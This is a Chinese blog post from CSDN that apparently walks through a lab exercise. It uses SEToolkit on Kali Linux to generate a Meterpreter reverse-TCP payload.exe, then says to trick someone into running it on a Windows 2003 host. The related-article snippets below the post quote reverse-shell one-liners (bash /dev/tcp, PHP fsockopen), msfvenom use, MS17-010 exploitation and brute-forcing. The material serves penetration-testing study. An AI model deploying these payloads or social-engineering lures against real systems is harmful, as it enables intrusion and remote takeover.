setoolkit反弹木马.kali linux 控制windows2003 ftp

最新推荐文章于 2024-01-10 09:39:28 发布
最新推荐文章于 2024-01-10 09:39:28 发布
阅读量354 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/99893802
版权

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:windows server 2003 Enterprise x64 SP2 
ip:192.168.172.137

控制过程:

step1:kali终端中输入setoolkis--"回车"

setp2:选择1,“1) Social-Engineering Attacks”

step3:选择4, “4) Create a Payload and Listener”

setp4:选择2,“2)Windows Reverse_TCP Meterpreter ”

step5:接下来填入kali 监控IP地址,和监听端口。

step6:之后会升成payload.exe文件,输入yes,监听开始。

step7:将payload.exe复制到windows2003中,诱惑别人点击这个文件,此时kali liux中监听上线。

 

 

02be55f
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux 2 Windows Penetration Testing.pdf
04-22
Kali Linux 2 Windows渗透测试》是一本专注于渗透测试的书籍,特别关注在Windows环境下使用Kali Linux进行安全测试。Kali Linux是一个以安全工作和渗透测试为主要功能的操作系统,由著名的安全专家Wolf Halton和Bo...
Mastering.Kali.Linux.Wireless.Pentesting.1785285564
03-14
Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing. It gives access to a large collection of security-related tools for professional security ...
[可行]setoolkit生成木马软件远程控制实例
weixin_33901641的博客
02-12 801
查看原文 选1,social-ensineering attacks 选4,create a payload and listener 选2,Windows Reverse_TCP Meterpreter LHOST 192.168.1.92 PORT 443 得到~/.set/payload.exe 想办法让目标运行payload 回车开始监控。 meterpreter得到,可以使用以下...
kali-Linux局域网渗透之Win2003
LJHandCXY的博客
02-27 3815
相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 1.蓝屏攻击   原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码   前提:对方开启3389端口且只对某些操作系统有效   操作: 1.扫描 nmap -sS -O [IP地址] 或 nmap -sT [IP地址] 大家看着来啊!(我是比较习惯用这两个) 如果大家扫描0
社工工具包 SEToolkit
weixin_30790841的博客
08-14 1551
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不...
HCIE-Security安全-TCP劫持攻击反弹shell)
qq_44667101的博客
03-19 877
文章目录TCP劫持攻击攻击思路实验拓扑设备说明攻击步骤反弹shell注入原理操作指令利用tcp劫持来实现反弹shell攻击代码攻击步骤及指令拓展 TCP劫持攻击 攻击思路 1、hacker获取client与server的tcp会话包(通过arp毒化,mac泛洪攻击等); 2、观察server给client主机发送的tcp报文,以获取client将要给server发送的下一个报文信息; 3、hac...
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2752
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
Windows7下安装KaliLinux双系统.pdf
10-11
Windows7 下安装 Kali Linux 双系统 本文旨在指导小白用户如何在 Windows 7 操作系统下安装 Kali Linux 双系统,从而扫除初学者的障碍。下面是详细的安装步骤和知识点。 知识点一:安装准备 在安装 Kali Linux ...
Packt.Kali.Linux.2018.2nd.Edition
06-24
You will start by learning about the various desktop environments that now come with Kali. The book covers network sniffers and analysis tools to uncover the Windows protocols in use on the network. ...
技术分享:Setoolkit克隆网站
liu914589417的博客
05-06 2324
技术分享:Setoolkit克隆网站 实验工具 1、 VMware虚拟机 2、 Kali 2021 系统虚拟机 3、Windows 10物理机 4、Setoolkit社会工程学工具集 1、在VMware中打开Kali 2021虚拟机,确保与物理机Windows 10是连通状态,测试一下。 2、确定能连通后,回到Kali 2021虚拟机,打开一个【终端】,输入命令【setoolkit】进入社会工程学工具集,准备克隆网站。 3、回车执行后,开始进行克隆网站的准备工作,在出现的这些选项中选择【1)Social
反弹shell方法汇总
最新发布
2301_76786857的博客
01-10 1599
reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
shell反弹的几种方式
nextdoor6的博客
05-16 5863
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
永恒之蓝——Windows server 2003 漏洞复现
Megumiwind的博客
07-28 1631
复现漏洞 靶机:Windows server 2003 IP:192.168.64.129 攻击机:kali 2021 1.在kali中启动msf模块 在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。 2.搜索ms17_010:search ms17_010 3.使用命令:use auxiliary/scanner/smb/smb_ms1...
Kali渗透Windows Server 2003
xiaopan233的博客
11-12 7899
两台虚拟机 kali ip 192.168.18.128 windows ip 192.168.18.133 1)首先先扫描一下靶机 nmap -sS -sV -O -Pn 192.168.18.133 其中sS是半开放扫描,sV是扫描版本号,O是扫描操作系统,Pn是不进行ping,会快一点。 可以看到有445端口,且是windows server 2003。 2)使用msfco...
Kali linux利用(ms17-010)漏洞入侵Windows server 2003
王先生的蒋小姐的博客
04-02 7305
NMAP MSF实现对目标系统渗透(Windows server 2003控制) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。 此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境均采用虚拟机。 前提准备: Kali linux: 192.168.1.113 ...
6-2漏洞利用-ftp不可避免的问题
山兔的博客
07-01 1037
Windows下 CMD命令添加用户、以及提升Administrator管理员权限,之后这个用户将做为登录FTP的用户名和密码 windowsFTP服务器添加用户,否则我们就不能使用我们添加的admin1用户登录打开iis管理器使用medusa暴力破解工具来破解admin1用户的密码在最后输出了对应的用户名密码先用nc连接一下ftp服务 连接成功只有在输入正确的账号密码的情况下,才会登录成功 可以看到,我们在最后发现了用户名密码,我们也可以不知道用户名、密码进行破解这个时候,我们就可以用nc登录FT
FTP 跳转攻击
mgxcool的专栏
09-06 8755
FTP主动模式中,客户端向服务器发送port命令,指定ip和端口号,服务器收到后,会从80端口发起数据连接。PORT命令格式如下: PORT A,B,C,D,E,F 服务器解析后,参数的前四个字段,作为地址A.B.C.D,对应的数据连接的目标端口为E*256+F。   ftp的这个特性,被利用的话,可以导致安全问题。假设A.B.C.D是一个邮件服务器,那么如果E,F的值算出
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
VirtualBox详述:安装Kali Linux 2016.2教程
本篇教程详细介绍了如何在VirtualBox虚拟化环境中安装Kali Linux 2016.2操作系统。VirtualBox是一款功能强大的开源虚拟机软件,以其轻量级、易用性著称,适合初学者和专业开发人员进行安全测试、开发环境搭建等需求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值